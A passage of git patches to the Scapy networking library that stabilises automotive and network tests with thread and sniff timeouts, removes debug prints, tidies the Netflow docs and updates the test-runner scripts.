sniff(session=ISOTPSession, session_kwargs={"supersession": session, "did":[0x241, 0x641, 0x101], "basecls":GMLAN}, count=16, opened_socket=sock, timeout=3) ecu = session.ecu print("Check 4 after gaining security access") assert len(ecu.supported_responses) == 7 @@ -216,8 +208,10 @@ with CandumpReader("test/contrib/automotive/gmlan_trace.candump") as sock: session = EcuSession(verbose=False, store_supported_responses=False) +conf.contribs['GMLAN']['GMLAN_ECU_AddressingScheme'] = 4 + with CandumpReader("test/contrib/automotive/gmlan_trace.candump") as sock: - gmlanmsgs = sniff(session=ISOTPSession, session_kwargs={"supersession": session, "did":[0x241, 0x641, 0x101], "basecls":GMLAN}, count=200, opened_socket=sock) + gmlanmsgs = sniff(session=ISOTPSession, session_kwargs={"supersession": session, "did":[0x241, 0x641, 0x101], "basecls":GMLAN}, count=200, opened_socket=sock, timeout=6) ecu = session.ecu assert len(ecu.supported_responses) == 0 diff --git a/test/contrib/automotive/interface_mockup.py b/test/contrib/automotive/interface_mockup.py index a87ba45c232..c5939441f2f 100644 --- a/test/contrib/automotive/interface_mockup.py +++ b/test/contrib/automotive/interface_mockup.py @@ -98,6 +98,12 @@ def cleanup_interfaces(): :return: True on success """ + import threading + from scapy.contrib.isotp import CANReceiverThread + for t in threading.enumerate(): + if isinstance(t, CANReceiverThread): + t.join(10) + if LINUX and _not_pypy and _root: if 0 != subprocess.call(["sudo", "ip", "link", "delete", iface0]): raise Exception("%s could not be deleted" % iface0) diff --git a/test/contrib/automotive/uds_utils.uts b/test/contrib/automotive/uds_utils.uts index 1e77082ee4e..b3c98d6bb1f 100644 --- a/test/contrib/automotive/uds_utils.uts +++ b/test/contrib/automotive/uds_utils.uts @@ -41,7 +41,7 @@ with new_can_socket0() as isocan1, ISOTPSocket(isocan1, sid=0x241, did=0x641, ba threadSniffer = threading.Thread(target=sniffer) threadSniffer.start() sessions = UDS_SessionEnumerator(sendSock, session_range=range(3)) - threadSniffer.join() + threadSniffer.join(timeout=30) assert sniffed == 3*2 assert succ @@ -70,7 +70,7 @@ with new_can_socket0() as isocan1, ISOTPSocket(isocan1, sid=0x241, did=0x641, ba threadSniffer = threading.Thread(target=sniffer) threadSniffer.start() services = UDS_ServiceEnumerator(sendSock) - threadSniffer.join() + threadSniffer.join(timeout=30) assert sniffed == 128 assert succ @@ -85,9 +85,6 @@ res_a = getTableEntry(a) res_b = getTableEntry(b) res_c = getTableEntry(c) -print(res_a) -print(res_b) -print(res_c) #make_lined_table([a, b, c], getTableEntry) assert res_a == ('DefaultSession', '0x27: SecurityAccess', 'PositiveResponse') diff --git a/test/contrib/automotive/xcp/xcp.uts b/test/contrib/automotive/xcp/xcp.uts index 98d7023ded6..f65814b5528 100644 --- a/test/contrib/automotive/xcp/xcp.uts +++ b/test/contrib/automotive/xcp/xcp.uts @@ -671,7 +671,7 @@ thread.start() time.sleep(0.1) pkt = XCPOnCAN(identifier=0x700) / CTORequest() / Connect() ans = sock1.sr1(pkt, timeout=3) -thread.join() +thread.join(timeout=3) sock1.close() sock2.close() @@ -770,7 +770,6 @@ assert cto_request.ctr == 0 assert cto_request.pid == 0xFF assert cto_request.connection_mode == 0 assert bytes(cto_request).endswith(b'\x00\x02\x00\x00\xff\x00') -print(XCPOnUDP(ctr=0, sport=1, dport=1)) xcp_on_udp = XCPOnUDP(b'\x00\x01\x00\x01\x00\x0c\x00\x00\x00\x08\x00\x01\xff\x15\xC0\x08\x08\x00\x10\x10') assert xcp_on_udp.length == 8 assert xcp_on_udp.ctr == 1 diff --git a/test/contrib/cansocket.uts b/test/contrib/cansocket.uts index e227e5437f7..75120ec62bc 100644 --- a/test/contrib/cansocket.uts +++ b/test/contrib/cansocket.uts @@ -237,8 +237,8 @@ assert len(packetsVCan1) == 6 sock1.close() sock0.close() -threadBridge.join() -threadSender.join() +threadBridge.join(timeout=3) +threadSender.join(timeout=3) = PythonCANSocket bridge and sniff setup vcan1 package forwarding @@ -281,8 +281,8 @@ assert len(packetsVCan1) == 6 sock1.close() sock0.close() -threadBridge.join() -threadSender.join() +threadBridge.join(timeout=3) +threadSender.join(timeout=3) + Cleanup diff --git a/test/contrib/cansocket_native.uts b/test/contrib/cansocket_native.uts index 865113cbfd6..77e23adf64b 100644 --- a/test/contrib/cansocket_native.uts +++ b/test/contrib/cansocket_native.uts @@ -94,7 +94,7 @@ def sender(): thread = threading.Thread(target=sender) thread.start() rx = None -rx = sock1.sr1(tx, verbose=False) +rx = sock1.sr1(tx, verbose=False, timeout=3) rx == tx sock1.close() @@ -298,7 +298,7 @@ sock1.close() sock1 = CANSocket(channel="vcan0", receive_own_messages=True) tx = CAN(identifier=0x7ff,length=8,data=b'\x01\x02\x03\x04\x05\x06\x07\x08') rx = None -rx = sock1.sr1(tx, verbose=False) +rx = sock1.sr1(tx, verbose=False, timeout=3) tx == rx tx.sent_time < rx.time and tx == rx and rx.time > 0 diff --git a/test/contrib/cansocket_python_can.uts b/test/contrib/cansocket_python_can.uts index 0e1a8bc4171..3282c1ddaac 100644 --- a/test/contrib/cansocket_python_can.uts +++ b/test/contrib/cansocket_python_can.uts @@ -296,8 +296,8 @@ assert len(packetsVCan1) == 6 sock1.close() sock0.close() -threadBridge.join() -threadSender.join() +threadBridge.join(timeout=3) +threadSender.join(timeout=3) = bridge and sniff setup vcan0 package forwarding @@ -334,8 +334,8 @@ len(packetsVCan0) == 4 sock0.close() sock1.close() -threadBridge.join() -threadSender.join() +threadBridge.join(timeout=3) +threadSender.join(timeout=3) =bridge and sniff setup vcan0 vcan1 package forwarding both directions @@ -381,8 +381,8 @@ len(packetsVCan1) == 6 sock0.close() sock1.close() -threadBridge.join() -threadSender.join() +threadBridge.join(timeout=3) +threadSender.join(timeout=3) =bridge and sniff setup vcan1 package change @@ -423,8 +423,8 @@ len(packetsVCan1) == 6 sock0.close() sock1.close() -threadBridge.join() -threadSender.join() +threadBridge.join(timeout=3) +threadSender.join(timeout=3) =bridge and sniff setup vcan0 package change @@ -463,8 +463,8 @@ len(packetsVCan0) == 4 sock0.close() sock1.close() -threadBridge.join() -threadSender.join() +threadBridge.join(timeout=3) +threadSender.join(timeout=3) =bridge and sniff setup vcan0 and vcan1 package change in both directions @@ -511,8 +511,8 @@ len(packetsVCan1) == 6 sock0.close() sock1.close() -threadBridge.join() -threadSender.join() +threadBridge.join(timeout=3) +threadSender.join(timeout=3) =bridge and sniff setup vcan0 package remove @@ -556,8 +556,8 @@ len(packetsVCan1) == 5 sock0.close() sock1.close() -threadBridge.join() -threadSender.join() +threadBridge.join(timeout=3) +threadSender.join(timeout=3) =bridge and sniff setup vcan1 package remove @@ -599,8 +599,8 @@ len(packetsVCan0) == 3 sock0.close() sock1.close() -threadBridge.join() -threadSender.join() +threadBridge.join(timeout=3) +threadSender.join(timeout=3) =bridge and sniff setup vcan0 and vcan1 package remove both directions diff --git a/test/contrib/isotp.uts b/test/contrib/isotp.uts index cf1d5f35b18..ff9f85aa3c8 100644 --- a/test/contrib/isotp.uts +++ b/test/contrib/isotp.uts @@ -5,7 +5,7 @@ = Imports -from six.moves.queue import Queue +from scapy.modules.six.moves.queue import Queue from io import BytesIO from scapy.contrib.isotp import get_isotp_packet @@ -1294,7 +1294,6 @@ with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x641, did=0x241) as s except Scapy_Exception as ex: exception = ex -print(exception) assert(str(exception) == "TX state was reset due to timeout" or str(exception) == "ISOTP send not completed in 30s") = Check if not sending the second FC will make the socket timeout @@ -1351,7 +1350,7 @@ with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x641, did=0x241) as s thread.join(timeout=5) assert(exception is not None) -print(exception) + assert(str(exception) == "Overflow happened at the receiver side") = Close the Socket @@ -1404,7 +1403,7 @@ with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, 0x123, 0x321) as txSoc global rx2, sent with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, 0x321, 0x123) as rxSock: evt.set() - rx2 = rxSock.sniff(count=1) + rx2 = rxSock.sniff(count=1, timeout=3) rxSock.send(msg) sent = True rxThread = threading.Thread(target=receiver, name="receiver") @@ -1541,8 +1540,6 @@ with new_can_socket0() as can0_0, \ sender = threading.Thread(target=sendpkts) packetsVCan1 = isoTpSocket1.sniff(timeout=T, count=N, started_callback=sender.start) sender.join(timeout=5) - print("forwarded: %d" % forwarded) - print("len(packetsVCan1): %d" % len(packetsVCan1)) threadBridge.join(timeout=5) assert forwarded == N @@ -1691,8 +1688,6 @@ with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x641, did=0x241, padd cans.send(CAN(identifier=0x241, data=dhex("21 07 08 09 00 00 00 00"))) res = s.recv() res.show() - print(res.data) - print(raw(res)) assert(res.data == dhex("01 02 03 04 05 06 07 08 09")) @@ -1708,7 +1703,6 @@ with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x642, did=0x242) as s p = subprocess.Popen(["isotpsend", "-s", "242", "-d", "642", iface0], stdin=subprocess.PIPE, universal_newlines=True) p.communicate(message) r = p.returncode - print("returncode is %d" % r) assert(r == 0) isotp = s.recv() assert(isotp.data == dhex(message)) @@ -1722,7 +1716,6 @@ with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x644, did=0x244, exte p = subprocess.Popen(["isotpsend", "-s", "244", "-d", "644", "-x", "ee:aa", iface0], stdin=subprocess.PIPE, universal_newlines=True) p.communicate(message) r = p.returncode - print("returncode is %d" % r) assert(r == 0) isotp = s.recv() assert(isotp.data == dhex(message)) @@ -1733,7 +1726,6 @@ exit_if_no_isotp_module() isotp = ISOTP(data=bytearray(range(1,20))) cmd = ["isotprecv", "-s", "243", "-d", "643", "-b", "3", iface0] -print(" ".join(cmd)) p = subprocess.Popen(cmd, stdout=subprocess.PIPE) time.sleep(0.1) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x643, did=0x243) as s: @@ -1741,7 +1733,6 @@ with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x643, did=0x243) as s threading.Timer(1, lambda: p.terminate() if p.poll() else p.wait()).start() # Timeout the receiver after 1 second r = p.wait() -print("returncode is %d" % r) assert(0 == r) result = None @@ -1752,7 +1743,6 @@ for i in range(10): break assert(result is not None) -print(result) result_data = dhex(result) assert(result_data == isotp.data) @@ -1761,7 +1751,6 @@ assert(result_data == isotp.data) exit_if_no_isotp_module() isotp = ISOTP(data=bytearray(range(1,20))) cmd = ["isotprecv", "-s245", "-d645", "-b3", "-x", "ee:aa", iface0] -print(" ".join(cmd)) p = subprocess.Popen(cmd, stdout=subprocess.PIPE) time.sleep(0.1) # Give some time for starting reception with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x645, did=0x245, extended_addr=0xaa, extended_rx_addr=0xee) as s: @@ -1769,7 +1758,6 @@ with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x645, did=0x245, exte threading.Timer(1, lambda: p.terminate() if p.poll() else p.wait()).start() # Timeout the receiver after 1 second r = p.wait() -print("returncode is %d" % r) assert(0 == r) result = None @@ -1780,7 +1768,6 @@ for i in range(10): break assert(result is not None) -print(result) result_data = dhex(result) assert(result_data == isotp.data) diff --git a/test/linux.uts b/test/linux.uts index 24afe5803be..10d49484dcf 100644 --- a/test/linux.uts +++ b/test/linux.uts @@ -187,7 +187,8 @@ try: store=True, count=2, lfilter=lambda p: Ether in p and p[Ether].type == 0xbeef, - started_callback=_sniffer_started) + started_callback=_sniffer_started, + timeout=3) global frm_count frm_count = 2 t_sniffer = Thread(target=_sniffer, name="linux.uts sniff veth_scapy_1") @@ -244,7 +245,8 @@ def _sniffer(): store=True, count=2, lfilter=lambda p: Ether in p and p[Ether].type == 0xbeef, - started_callback=_sniffer_started) + started_callback=_sniffer_started, + timeout=3) global frm_count frm_count = 2 @@ -292,9 +294,10 @@ test_read_routes() ~ linux needs_root from scapy.arch.linux import L3PacketSocket +import scapy.modules.six as six if six.PY3: - import mock, six, socket + import mock, socket @mock.patch("scapy.arch.linux.socket.socket.sendto") def test_L3PacketSocket_sendto_python3(mock_sendto): mock_sendto.side_effect = OSError(22, 2807) diff --git a/test/regression.uts b/test/regression.uts index bd7a879dff3..ba7c519f2e1 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -1375,7 +1375,7 @@ conf.L3socket = L3RawSocket def _test(): req = IP(dst="127.0.0.1")/ICMP() - ans = sr1(req) + ans = sr1(req, timeout=3) assert (ans.time - req.sent_time) >= 0 assert (ans.time - req.sent_time) <= 1e-3 @@ -1565,7 +1565,7 @@ assert a.sent_time is None def _test(): old_debug_dissector = conf.debug_dissector conf.debug_dissector = False - ans,unans=sr(IP(dst="www.google.com/30")/TCP(dport=[80,443]),timeout=2) + ans,unans=sr(IP(dst="www.google.com/30")/TCP(dport=[80,443]), timeout=2) conf.debug_dissector = old_debug_dissector # Backward compatibility: Python 2 only @@ -1653,7 +1653,7 @@ def _send_or_sniff(pkt, timeout, flt, pid, fork, t_other=None, opened_socket=Non if fork: os.waitpid(pid, 0) else: - t_other.join() + t_other.join(timeout=3) assert raw(pkt) in (raw(p[pkt.__class__]) for p in pkts if pkt.__class__ in p) def send_and_sniff(pkt, timeout=2, flt=None, opened_socket=None): @@ -1670,8 +1670,8 @@ def send_and_sniff(pkt, timeout=2, flt=None, opened_socket=None): t_child = Thread(target=run_function, args=(pkt, timeout, flt, 1, t_parent, results, opened_socket), name="send_and_sniff 2") t_parent.start() t_child.start() - t_parent.join() - t_child.join() + t_parent.join(timeout=3) + t_child.join(timeout=3) assert results.qsize() >= 2 while not results.empty(): assert results.get() @@ -3103,7 +3103,7 @@ class DNSTCP(Packet): ssck = StreamSocket(sck) ssck.basecls = DNSTCP -r = ssck.sr1(DNSTCP(dns=DNS(rd=1, qd=DNSQR(qname="www.example.com")))) +r = ssck.sr1(DNSTCP(dns=DNS(rd=1, qd=DNSQR(qname="www.example.com"))), timeout=3) sck.close() assert(DNSTCP in r and len(r.dns.an)) diff --git a/test/tools/isotpscanner.uts b/test/tools/isotpscanner.uts index d9430df2ba7..2e377f31938 100644 --- a/test/tools/isotpscanner.uts +++ b/test/tools/isotpscanner.uts @@ -63,10 +63,6 @@ returncode = result.wait() expected_output = plain_str(b'Start scan') std_out, std_err = result.communicate() -print(std_out) -print("%s" % std_err) -print(expected_output) - assert returncode == 0 assert expected_output in plain_str(std_out) @@ -74,12 +70,8 @@ assert expected_output in plain_str(std_out) result = subprocess.Popen([sys.executable, "scapy/tools/automotive/isotpscanner.py", "-i", "socketcan", "-c", iface0, "-a", "bitrate=500000", "-s", "0x600", "-e", "0x600", "-v"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) returncode = result.wait() -print(returncode) expected_output = plain_str(b'Start scan') std_out, std_err = result.communicate() -print(std_out) -print("%s" % std_err) -print(expected_output) assert returncode == 0 assert expected_output in plain_str(std_out) @@ -89,12 +81,8 @@ assert expected_output in plain_str(std_out) result = subprocess.Popen([sys.executable, "scapy/tools/automotive/isotpscanner.py", "-i", "socketcan", "-c", iface0, "-a", "bitrate=500000 receive_own_messages=True", "-s", "0x600", "-e", "0x600", "-v"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) returncode = result.wait() -print(returncode) expected_output = plain_str(b'Start scan') std_out, std_err = result.communicate() -print(std_out) -print("%s" % std_err) -print(expected_output) assert returncode == 0 assert expected_output in plain_str(std_out) @@ -103,12 +91,8 @@ assert expected_output in plain_str(std_out) result = subprocess.Popen([sys.executable, "scapy/tools/automotive/isotpscanner.py", "-i", "socketcan", "-c", iface0, "--python-can_args", "bitrate=500000 receive_own_messages=True", "-s", "0x600", "-e", "0x600", "-v"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) returncode = result.wait() -print(returncode) expected_output = plain_str(b'Start scan') std_out, std_err = result.communicate() -print(std_out) -print("%s" % std_err) -print(expected_output) assert returncode == 0 assert expected_output in plain_str(std_out) @@ -143,10 +127,6 @@ assert 0 == send_returncode assert returncode1 == 0 assert returncode2 == 0 -print(std_out1) -print(std_err1) -print(std_out2) -print(std_err2) expected_output = [b'0x600', b'0x700'] for out in expected_output: assert plain_str(out) in plain_str(std_out1 + std_out2) diff --git a/test/tools/xcpscanner.uts b/test/tools/xcpscanner.uts index d24ecbfbef6..10067433e53 100644 --- a/test/tools/xcpscanner.uts +++ b/test/tools/xcpscanner.uts @@ -65,7 +65,7 @@ thread.start() scanner = XCPOnCANScanner(sock2, id_range=id_range, sniff_time=0.5) result = scanner.scan_with_get_slave_id() -thread.join() +thread.join(timeout=3) sock1.close() sock2.close() assert len(result) == 2 @@ -112,7 +112,7 @@ thread.start() scanner = XCPOnCANScanner(sock2, id_range=id_range, sniff_time=0.5) result = scanner.scan_with_connect() -thread.join() +thread.join(timeout=3) sock1.close() sock2.close() diff --git a/test/tuntap.uts b/test/tuntap.uts index ca432d75eb2..7289831a914 100644 --- a/test/tuntap.uts +++ b/test/tuntap.uts @@ -62,7 +62,7 @@ assert subprocess.check_call(["ping", "-c3", "192.0.2.2"]) == 0 = Cleanup -t_am.join() +t_am.join(timeout=3) tun0.close() if not conf.use_pypy: From 66103791f1b052f24813ae40f8f13769f2459f46 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Fri, 5 Feb 2021 16:31:06 +0100 Subject: [PATCH 0501/1632] Cleanup netflow doc --- doc/scapy/layers/netflow.rst | 14 ++++++++------ scapy/layers/netflow.py | 10 +++++++--- 2 files changed, 15 insertions(+), 9 deletions(-) diff --git a/doc/scapy/layers/netflow.rst b/doc/scapy/layers/netflow.rst index 23be7a5b106..5c297732093 100644 --- a/doc/scapy/layers/netflow.rst +++ b/doc/scapy/layers/netflow.rst @@ -45,15 +45,17 @@ Fortunately, Scapy knows how to detect the templates and will provide dissecting header = Ether()/IP()/UDP() netflow_header = NetflowHeader()/NetflowHeaderV9() - # Let's first build the template. Those need an ID > 255 + # Let's first build the template. Those need an ID > 255. + # The (full) list of possible fieldType is available in the + # NetflowV910TemplateFieldTypes list. You can also use the int value. flowset = NetflowFlowsetV9( templates=[NetflowTemplateV9( template_fields=[ - NetflowTemplateFieldV9(fieldType=1, fieldLength=1), # IN_BYTES - NetflowTemplateFieldV9(fieldType=2, fieldLength=4), # IN_PKTS - NetflowTemplateFieldV9(fieldType=4), # PROTOCOL - NetflowTemplateFieldV9(fieldType=8), # IPV4_SRC_ADDR - NetflowTemplateFieldV9(fieldType=12), # IPV4_DST_ADDR + NetflowTemplateFieldV9(fieldType="IN_BYTES", fieldLength=1), + NetflowTemplateFieldV9(fieldType="IN_PKTS", fieldLength=4), + NetflowTemplateFieldV9(fieldType="PROTOCOL"), + NetflowTemplateFieldV9(fieldType="IPV4_SRC_ADDR"), + NetflowTemplateFieldV9(fieldType="IPV4_DST_ADDR"), ], templateID=256, fieldCount=5) diff --git a/scapy/layers/netflow.py b/scapy/layers/netflow.py index e08a55eb3a8..be69f4f20d6 100644 --- a/scapy/layers/netflow.py +++ b/scapy/layers/netflow.py @@ -1270,14 +1270,18 @@ class NetflowTemplateFieldV9(Packet): fields_desc = [BitField("enterpriseBit", 0, 1), BitEnumField("fieldType", None, 15, NetflowV910TemplateFieldTypes), - ShortField("fieldLength", 0), + ShortField("fieldLength", None), ConditionalField(IntField("enterpriseNumber", 0), lambda p: p.enterpriseBit)] def __init__(self, *args, **kwargs): Packet.__init__(self, *args, **kwargs) - if self.fieldType is not None and not self.fieldLength and self.fieldType in NetflowV9TemplateFieldDefaultLengths: # noqa: E501 - self.fieldLength = NetflowV9TemplateFieldDefaultLengths[self.fieldType] # noqa: E501 + if (self.fieldType is not None and + self.fieldLength is None and + self.fieldType in NetflowV9TemplateFieldDefaultLengths): + self.fieldLength = NetflowV9TemplateFieldDefaultLengths[ + self.fieldType + ] def default_payload_class(self, p): return conf.padding_layer From 862cead933714d4a7e307ce57d959699e61b6558 Mon Sep 17 00:00:00 2001 From: Pierre Lalet Date: Mon, 8 Feb 2021 15:20:29 +0100 Subject: [PATCH 0502/1632] automotive/bmw: "default values that work" --- scapy/contrib/automotive/bmw/definitions.py | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/scapy/contrib/automotive/bmw/definitions.py b/scapy/contrib/automotive/bmw/definitions.py index 2ca3e12fde8..50f1dad967b 100644 --- a/scapy/contrib/automotive/bmw/definitions.py +++ b/scapy/contrib/automotive/bmw/definitions.py @@ -293,9 +293,9 @@ class DIAG_SESSION_RESP(Packet): class IP_CONFIG_RESP(Packet): fields_desc = [ ByteField('ADDRESS_FORMAT_ID', 0), - IPField('IP', ''), - IPField('SUBNETMASK', ''), - IPField('DEFAULT_GATEWAY', '') + IPField('IP', '192.168.0.10'), + IPField('SUBNETMASK', '255.255.255.0'), + IPField('DEFAULT_GATEWAY', '192.168.0.1') ] From 10ca557bee66ea9b3c7053e7bf3e4cd4dfe39166 Mon Sep 17 00:00:00 2001 From: Gabriel Date: Wed, 10 Feb 2021 11:53:42 +0100 Subject: [PATCH 0503/1632] Various stabilizations (#3095) * Upgrade run_tests.bat * Make TCP_client slightly more stable * Order TESTFILES in UTscapy * Stabilize various tests --- scapy/autorun.py | 8 +-- scapy/layers/inet.py | 4 ++ scapy/tools/UTscapy.py | 2 +- test/contrib/isotp.uts | 2 + test/run_tests | 2 +- test/run_tests.bat | 27 ++++++++-- test/sendsniff.uts | 92 ++++++++++++++++++++++---------- test/tls/tests_tls_netaccess.uts | 3 +- 8 files changed, 101 insertions(+), 39 deletions(-) diff --git a/scapy/autorun.py b/scapy/autorun.py index d2db7cc0f5b..e419f0c5b67 100644 --- a/scapy/autorun.py +++ b/scapy/autorun.py @@ -93,12 +93,14 @@ def __init__(self, debug=None): self.debug = debug def write(self, x): - if self.debug: + # Object can be in the middle of being destroyed. + if getattr(self, "debug", None): self.debug.write(x) - self.s += x + if getattr(self, "s", None) is not None: + self.s += x def flush(self): - if self.debug: + if getattr(self, "debug", None): self.debug.flush() diff --git a/scapy/layers/inet.py b/scapy/layers/inet.py index 23fa2288e50..5222df51f8a 100644 --- a/scapy/layers/inet.py +++ b/scapy/layers/inet.py @@ -1952,6 +1952,10 @@ def stop_send_ack(self, pkt): self.l4[TCP].ack = pkt[TCP].seq + 1 self.send(self.l4) + @ATMT.timeout(SYN_SENT, 1) + def syn_ack_timeout(self): + raise self.CLOSED() + @ATMT.timeout(STOP_SENT_FIN_ACK, 1) def stop_ack_timeout(self): raise self.CLOSED() diff --git a/scapy/tools/UTscapy.py b/scapy/tools/UTscapy.py index 9365e77e958..115a161026c 100644 --- a/scapy/tools/UTscapy.py +++ b/scapy/tools/UTscapy.py @@ -919,7 +919,7 @@ def resolve_testfiles(TESTFILES): for tfile in TESTFILES[:]: if "*" in tfile: TESTFILES.remove(tfile) - TESTFILES.extend(glob.glob(tfile)) + TESTFILES.extend(sorted(glob.glob(tfile))) return TESTFILES diff --git a/test/contrib/isotp.uts b/test/contrib/isotp.uts index ff9f85aa3c8..ccbc28134e8 100644 --- a/test/contrib/isotp.uts +++ b/test/contrib/isotp.uts @@ -1,5 +1,7 @@ % Regression tests for ISOTP +~ vcan_socket + + Configuration ~ conf diff --git a/test/run_tests b/test/run_tests index b67219781cf..1b747d5b1b8 100755 --- a/test/run_tests +++ b/test/run_tests @@ -52,7 +52,7 @@ then fi # Run tox - export UT_FLAGS="-K tcpdump -K manufdb -K wireshark -K ci_only" + export UT_FLAGS="-K tcpdump -K manufdb -K wireshark -K ci_only -K vcan_socket" export SIMPLE_TESTS="true" PYVER=$($PYTHON -c "import sys; print('.'.join(sys.version.split('.')[:2]))") ${DIR}/.config/ci/test.sh $PYVER non_root diff --git a/test/run_tests.bat b/test/run_tests.bat index db6826c7a7e..623c9540ee1 100644 --- a/test/run_tests.bat +++ b/test/run_tests.bat @@ -2,16 +2,35 @@ set MYDIR=%~dp0.. set PWD=%MYDIR% set PYTHONPATH=%MYDIR% -REM shift will not work with %* +REM Note: shift will not work with %* +REM ### Get args, Handle Python version ### set "_args=%*" -IF "%1" == "--2" ( +IF "%1" == "-2" ( set PYTHON=python set "_args=%_args:~3%" -) ELSE IF "%1" == "--3" ( +) ELSE IF "%1" == "-3" ( set PYTHON=python3 set "_args=%_args:~3%" ) IF "%PYTHON%" == "" set PYTHON=python3 WHERE %PYTHON% >nul 2>&1 IF %ERRORLEVEL% NEQ 0 set PYTHON=python -%PYTHON% "%MYDIR%\scapy\tools\UTscapy.py" %_args% \ No newline at end of file +REM Reset Error level +VERIFY > nul +echo ##### Starting Unit tests ##### +REM ### Check no-argument mode ### +IF "%_args%" == "" ( + REM Check for tox + %PYTHON% -m tox --version >nul 2>&1 + IF %ERRORLEVEL% NEQ 0 ( + echo Tox not installed ! + pause + exit 1 + ) + REM Run tox + %PYTHON% -m tox -- -K tcpdump -K manufdb -K wireshark -K ci_only + pause + exit 0 +) +REM ### Start UTScapy normally ### +%PYTHON% "%MYDIR%\scapy\tools\UTscapy.py" %_args% diff --git a/test/sendsniff.uts b/test/sendsniff.uts index 234a5de519b..00a2952ee07 100644 --- a/test/sendsniff.uts +++ b/test/sendsniff.uts @@ -15,32 +15,42 @@ from threading import Thread tap0, tap1 = [TunTapInterface("tap%d" % i) for i in range(2)] +if six.PY2: + chk_kwargs = {} +else: + chk_kwargs = {"timeout": 3} + if LINUX: for i in range(2): - assert subprocess.check_call(["ip", "link", "set", "tap%d" % i, "up"]) == 0 + assert subprocess.check_call(["ip", "link", "set", "tap%d" % i, "up"], **chk_kwargs) == 0 else: for i in range(2): - assert subprocess.check_call(["ifconfig", "tap%d" % i, "up"]) == 0 + assert subprocess.check_call(["ifconfig", "tap%d" % i, "up"], **chk_kwargs) == 0 = Run a sniff thread on the tap1 **interface** * It will terminate when 5 IP packets from 192.0.2.1 have been sniffed +started = threading.Event() t_sniff = Thread( target=sniff, kwargs={"iface": "tap1", "count": 5, "prn": Packet.summary, - "lfilter": lambda p: IP in p and p[IP].src == "192.0.2.1"}, + "lfilter": lambda p: IP in p and p[IP].src == "192.0.2.1", + "started_callback": started.set}, name="tests sniff 1") t_sniff.start() +started.wait(timeout=5) = Run a bridge_and_sniff thread between the taps **sockets** * It will terminate when 5 IP packets from 192.0.2.1 have been forwarded +started = threading.Event() t_bridge = Thread(target=bridge_and_sniff, args=(tap0, tap1), kwargs={"store": False, "count": 5, 'prn': Packet.summary, - "lfilter": lambda p: IP in p and p[IP].src == "192.0.2.1"}, + "lfilter": lambda p: IP in p and p[IP].src == "192.0.2.1", + "started_callback": started.set}, name="tests bridge_and_sniff 1") t_bridge.start() +started.wait(timeout=5) = Send five IP packets from 192.0.2.1 to the tap0 **interface** -time.sleep(1) sendp([Ether(dst=ETHER_BROADCAST) / IP(src="192.0.2.1") / ICMP()], iface="tap0", count=5) @@ -52,12 +62,15 @@ assert not t_sniff.is_alive() = Run a sniff thread on the tap1 **interface** * It will terminate when 5 IP packets from 198.51.100.1 have been sniffed +started = threading.Event() t_sniff = Thread( target=sniff, kwargs={"iface": "tap1", "count": 5, "prn": Packet.summary, - "lfilter": lambda p: IP in p and p[IP].src == "198.51.100.1"}, + "lfilter": lambda p: IP in p and p[IP].src == "198.51.100.1", + "started_callback": started.set}, name="tests sniff 2") t_sniff.start() +started.wait(timeout=5) = Run a bridge_and_sniff thread between the taps **sockets** * It will "NAT" packets from 192.0.2.1 to 198.51.100.1 and will terminate when 5 IP packets have been forwarded @@ -68,15 +81,17 @@ def nat_1_2(pkt): return pkt return False +started = threading.Event() t_bridge = Thread(target=bridge_and_sniff, args=(tap0, tap1), kwargs={"store": False, "count": 5, 'prn': Packet.summary, "xfrm12": nat_1_2, - "lfilter": lambda p: IP in p and p[IP].src == "192.0.2.1"}, + "lfilter": lambda p: IP in p and p[IP].src == "192.0.2.1", + "started_callback": started.set}, name="tests bridge_and_sniff 2") t_bridge.start() +started.wait(timeout=5) = Send five IP packets from 192.0.2.1 to the tap0 **interface** -time.sleep(1) sendp([Ether(dst=ETHER_BROADCAST) / IP(src="192.0.2.1") / ICMP()], iface="tap0", count=5) @@ -108,42 +123,48 @@ from threading import Thread tun0, tun1 = [TunTapInterface("tun%d" % i) for i in range(2)] +if six.PY2: + chk_kwargs = {} +else: + chk_kwargs = {"timeout": 3} + if LINUX: for i in range(2): - assert subprocess.check_call(["ip", "link", "set", "tun%d" % i, "up"]) == 0 + assert subprocess.check_call(["ip", "link", "set", "tun%d" % i, "up"], **chk_kwargs) == 0 assert subprocess.check_call([ "ip", "addr", "change", - "192.0.2.1", "peer", "192.0.2.2", "dev", "tun0"]) == 0 + "192.0.2.1", "peer", "192.0.2.2", "dev", "tun0"], **chk_kwargs) == 0 else: for i in range(2): - assert subprocess.check_call(["ifconfig", "tun%d" % i, "up"]) == 0 - assert subprocess.check_call(["ifconfig", "tun0", "192.0.2.1", "192.0.2.2"]) == 0 - -print('waiting a bit...') -import time -time.sleep(10) + assert subprocess.check_call(["ifconfig", "tun%d" % i, "up"], **chk_kwargs) == 0 + assert subprocess.check_call(["ifconfig", "tun0", "192.0.2.1", "192.0.2.2"], **chk_kwargs) == 0 = Run a sniff thread on the tun1 **interface** * It will terminate when 5 IP packets from 192.0.2.1 have been sniffed +started = threading.Event() t_sniff = Thread(target=sniff, kwargs={"iface": "tun1", "count": 5, "prn": Packet.summary, - "lfilter": lambda p: IP in p and p[IP].src == "192.0.2.1"}, + "lfilter": lambda p: IP in p and p[IP].src == "192.0.2.1", + "started_callback": started.set}, name="tests sniff 3") t_sniff.start() +started.wait(timeout=5) = Run a bridge_and_sniff thread between the tuns **sockets** * It will terminate when 5 IP packets from 192.0.2.1 have been forwarded. +started = threading.Event() t_bridge = Thread(target=bridge_and_sniff, args=(tun0, tun1), kwargs={"store": False, "count": 5, 'prn': Packet.summary, "xfrm12": lambda 